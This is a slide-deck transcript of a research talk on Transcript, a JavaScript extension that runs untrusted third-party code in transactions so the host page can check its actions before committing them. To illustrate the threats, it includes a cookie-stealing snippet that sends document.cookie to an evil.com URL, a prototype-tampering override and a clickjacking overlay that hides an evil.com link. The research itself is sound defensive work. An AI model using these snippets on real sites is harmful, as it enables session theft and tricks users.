
Enhancing JavaScript with Transactions

Mohan Dhawan†, Chung-chieh Shan‡ and Vinod Ganapathy†. †Department of Computer Science, Rutgers University. ‡School of Informatics and Computing, Indiana University.


Presentation Transcript


1. Enhancing JavaScript with Transactions
Mohan Dhawan†, Chung-chieh Shan‡ and Vinod Ganapathy†
†Department of Computer Science, Rutgers University
‡School of Informatics and Computing, Indiana University
ECOOP 2012

2. Problem
• Web applications include third party content
• Examples: widgets, advertisements, libraries
• Such content may contain untrusted, malicious JavaScript

3. Example from nytimes.com
• Rogue third party advertisement
• Displayed an image of a fake virus scan
• Client security and privacy at risk

4. Solution: Transcript
• Extend JavaScript to support transactions
• Execute untrusted content speculatively
• Commit its changes only after policy enforcement

5. Goal
• Protect the Web application from security-violating actions of untrusted JavaScript
• Must handle arbitrary third party code written in JavaScript, including constructs such as eval, this and with
• Must enforce powerful security policies, for example:
  • Allow pop-ups from white-listed websites only
  • Disallow innerHTML in the context of the host Web application

6. Contributions
• JavaScript transactions: speculative execution of unmodified third party JavaScript code
• Transaction suspend/resume: lets the host Web application mediate external actions such as DOM and AJAX operations
• Speculative DOM updates

7. Schematic use of Transcript

    // Web application code
    var tx = transaction {
        ...   // unmodified 3rd party code
    };
    // Introspection block goes below
    /* policy enforcement code: validate the actions of the transaction */
    tx.commit();
    // Rest of the Web application code

(transaction is a keyword added by Transcript, see slide 13; this is not standard JavaScript.)

8. Example: Untrusted code

    // Web application code
    var tx = transaction {
        var image = document.createElement("img");
        var url = "http://evil.com/grabcookie.php";
        var params = document.cookie;              // reads a sensitive property
        image.src = url + "?cookie=" + params;
        document.body.appendChild(image);          // external DOM action: would leak the cookie
        ...
        Array.prototype.join = function() { return "evilString"; };   // tampers with a shared prototype
    };

9. Transcript runtime

    // Web application code
    tx = transaction {
        ...
        body.appendChild(image);
        ...
    };
    // Introspection block
    do {
        ...
        tx = tx.resume();
        ...
    } while (tx.isSuspended());
    tx.commit();
    // Rest of the Web application

• Transcript clones the host's DOM when the transaction starts; the guest's node accesses go to the clone (DOMTX) and its reads and writes are recorded in the transaction's read/write sets.
• On a transaction suspend, the Transcript runtime saves (i) the read and write sets, (ii) the speculative DOM and (iii) the stack frames up to the nearest transaction delimiter, and creates a Transaction object from them.
• In the introspection block, the host performs the action (appendChild) on behalf of the guest.
• When the transaction resumes, the runtime loads the saved read/write sets and stack frames.
September 19, 2014

10. Transaction suspend and resume

    var tx = transaction {
        ...
        document.body.appendChild(image);   // DOM call: suspends the transaction
    };
    // Introspection block
    do {
        var rs = tx.getReadSet(), arg = tx.getArgs();
        switch (tx.getCause()) {
            case "appendChild":
                // Policy: do not append an IMG node if the guest has read document.cookie.
                // (obj is the node the guest called appendChild on; the slide does not show how it is obtained.)
                if (!(arg[0].nodeName.match("IMG") && rs.checkMembership(document, "cookie")))
                    obj.appendChild(arg[0]);   // host performs the action on the guest's behalf
                break;
        } /* end switch */
        tx = tx.resume();
    } while (tx.isSuspended());

The condition above is the one in the slide's highlighted policy callout. The slide body shows the variant `if (arg[0].nodeName.match("IMG") && !rs.checkMembership(document, "cookie"))`, which also refuses to append any non-IMG node.

11. Read and write sets

    var tx = transaction {
        ...
        Array.prototype.join = function() { return "evilString"; };
    };
    /* Introspection code */
    var ws = tx.getWriteSet();
    // Policy: refuse to commit if the guest wrote any property of Array.prototype
    if (ws.checkMembership(Array.prototype, "*")) {
        to_commit = false;
    }
    // Rest of the web application code

12. Gluing

    var tx = transaction {
        ...
        document.write('<script src="newcode.js"></s' + 'cript>');
    };
    // Introspection block
    // Rest of the web application code

The script injected by document.write (newcode.js) is glued to the enclosing transaction: it also executes speculatively and is subject to the same introspection block, rather than escaping into the host Web application.

13. Implementation
• Prototype implementation in Firefox 3.7a4
• Added new JavaScript features: the transaction keyword and the Transaction object
• Modified SpiderMonkey op-codes to log all object accesses and to suspend on DOM / AJAX calls
• Added speculative execution support for DOM operations: all node accesses are redirected to the cloned copy

14. Evaluation
• Goals
  • Study the applicability of Transcript in isolating real guest code
  • Measure the performance impact on guest code and micro-benchmarks
  • Demonstrate graceful recovery in the presence of malicious and buggy guests
• Methodology
  • Isolated the guest code in a Web application using transactions
  • The introspection block for each transaction enforced a number of general and domain-specific policies

15. Applicability of Transcript
• Applied Transcript to five JavaScript widgets and applications, both stand-alone and library based
• No difference in behavior and functionality

16. Performance – Application benchmarks
[chart] Overhead = 0.16s

17. Performance – Microbenchmarks (Function calls)
[chart]

18. Performance – Microbenchmarks (JavaScript events)
[chart] Average overhead of just 94μs per event.

19. Recovery: Clickjacking

    // Visible link, placed behind everything else
    document.write('<div style="z-index:-1; ...other size/loc params">' +
                   '<a href="http://www.amazon.com"> Goto Amazon </a></div>');
    ...
    // Fully transparent div with the same size and location, placed on top,
    // so the user's click on "Goto Amazon" actually goes to evil.com
    document.write('<div style="opacity: 0.0; z-index:0; ...same size/loc params">' +
                   '<a href="http://evil.com"> Goto Amazon </a></div>');

20. Related Work
• Staged information flow in JavaScript (PLDI '09): hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code
• ConScript (S&P '10): aspect-oriented framework to specify and enforce fine-grained security policies for Web applications
• AdJail (Security '10): isolation mechanism to protect Web application content from malicious advertisements
• Caja, FBJS, AdSafe, etc.

21. Conclusion
• Transcript implements JavaScript transactions to provide isolation and recovery
  • Operations that break isolation are suspended, and resumed only if the Web application allows them
• Enforcement of powerful security policies
  • All data reads / writes are recorded and can be inspected before commit
• No restrictions on, or changes to, third party code

22. Questions?

23. Event handler wrapper generation

    // Guest code registers a handler inside a transaction:
    var tx = transaction {
        ...
        node.addEventListener("click", handler, false);
    };
    // Introspection block

    // Transcript rewrites the registration so that a generated wrapper is installed instead:
    var tx = transaction {
        ...
        node.addEventListener("click", tx_handler, false);
    };
    // Introspection block

    // When the event fires, the wrapper runs the original handler in a transaction of
    // its own and applies the same introspection block (iblock_func) to it:
    tx_handler = function(evt) {
        evt_tx = transaction { handler(evt); };
        iblock_func(evt_tx);
    };
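The wrapper generation above, as an added example in plain JavaScript; this is not Transcript's code. The point it makes is the security one: a handler that guest code registered inside a transaction fires later, after the transaction has committed, so without a wrapper it would run unmediated against the host. Here the guest's call to `addEventListener` is interposed on the speculative view and a generated `tx_handler` is registered instead; when the event fires, `tx_handler` runs the original handler in a fresh write-buffering transaction and hands that transaction to the same introspection block (`iblock_func`). Assumptions not in the original: a minimal `makeNode()` object with `addEventListener` and `dispatch` stands in for a DOM node, the registration itself is performed eagerly rather than speculatively, and a handler receives the speculative view as a second argument instead of the runtime redirecting its accesses.

```javascript
// Added example (not Transcript's code): generated event-handler wrappers that
// keep later event dispatches inside a transaction with the same policy.

// Minimal stand-in for a DOM node (constructed for this example).
function makeNode() {
  const listeners = {};
  return {
    text: "",
    addEventListener(type, fn) { (listeners[type] = listeners[type] || []).push(fn); },
    dispatch(type, evt) { for (const fn of listeners[type] || []) fn(evt); },
  };
}

// Write-buffering transaction over `node`: `body` runs against a proxied view;
// writes land in a write set and reach `node` only on commit. The view's
// addEventListener is interposed so the guest's handler is replaced by a wrapper.
function runTransaction(node, body, log) {
  const writes = new Map();
  const view = new Proxy(node, {
    get(t, prop) {
      if (prop === "addEventListener") {
        return (type, handler) => t.addEventListener(type, makeTxHandler(node, handler, log));
      }
      return writes.has(prop) ? writes.get(prop) : t[prop];
    },
    set(t, prop, value) { writes.set(prop, value); return true; },
  });
  body(view);
  return {
    writeSet: writes,
    commit() { for (const [p, v] of writes) node[p] = v; writes.clear(); },
    abort() { writes.clear(); },
  };
}

// Generated wrapper: when the event fires, run the guest's handler in its own
// transaction and pass that transaction to the shared introspection block.
function makeTxHandler(node, handler, log) {
  return function tx_handler(evt) {
    const evt_tx = runTransaction(node, (view) => handler(evt, view), log);
    iblock_func(evt_tx, log);
  };
}

// Introspection block shared by the outer transaction and every event transaction.
// Policy: the guest may change the node's text but may not replace its methods.
function iblock_func(tx, log) {
  const tampers = [...tx.writeSet.keys()].some((p) => p === "dispatch" || p === "addEventListener");
  if (tampers) { tx.abort(); log.push("abort"); } else { tx.commit(); log.push("commit"); }
}

// Constructed scenario: the guest registers two click handlers, one benign and
// one that tries to clobber dispatch. Without wrapper generation the second
// handler would later run outside any transaction and succeed.
function demo() {
  const node = makeNode();
  const originalDispatch = node.dispatch;
  const log = [];
  const tx = runTransaction(node, (view) => {
    view.text = "initial";
    view.addEventListener("click", (evt, v) => { v.text = "clicked:" + evt.id; });
    view.addEventListener("click", (evt, v) => { v.dispatch = () => {}; });
  }, log);
  iblock_func(tx, log);                  // outer transaction: only `text` was written, so commit
  node.dispatch("click", { id: 1 });     // later: each wrapper runs its handler transactionally
  return { text: node.text, log, dispatchIntact: node.dispatch === originalDispatch };
}
```

`demo()` yields a log of `commit, commit, abort`: the outer transaction commits, the benign handler's transaction commits (`text` becomes `clicked:1`), and the handler that wrote `dispatch` is aborted by the same policy, leaving the node's `dispatch` untouched.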

24. A complete example

    <script src="jsMenu.js" func="menu"></script>
    <script>
    (function () {
        var to_commit = true, e = eval;   // indirect eval
        var tx = transaction {
            e(getFunctionBody(menu));     // run the widget's entry point speculatively
        };
        do {
            ... <application-specific policies> ...
            tx = tx.resume();
        } while (tx.isSuspended());
        if (to_commit) tx.commit();
    })();
    </script>
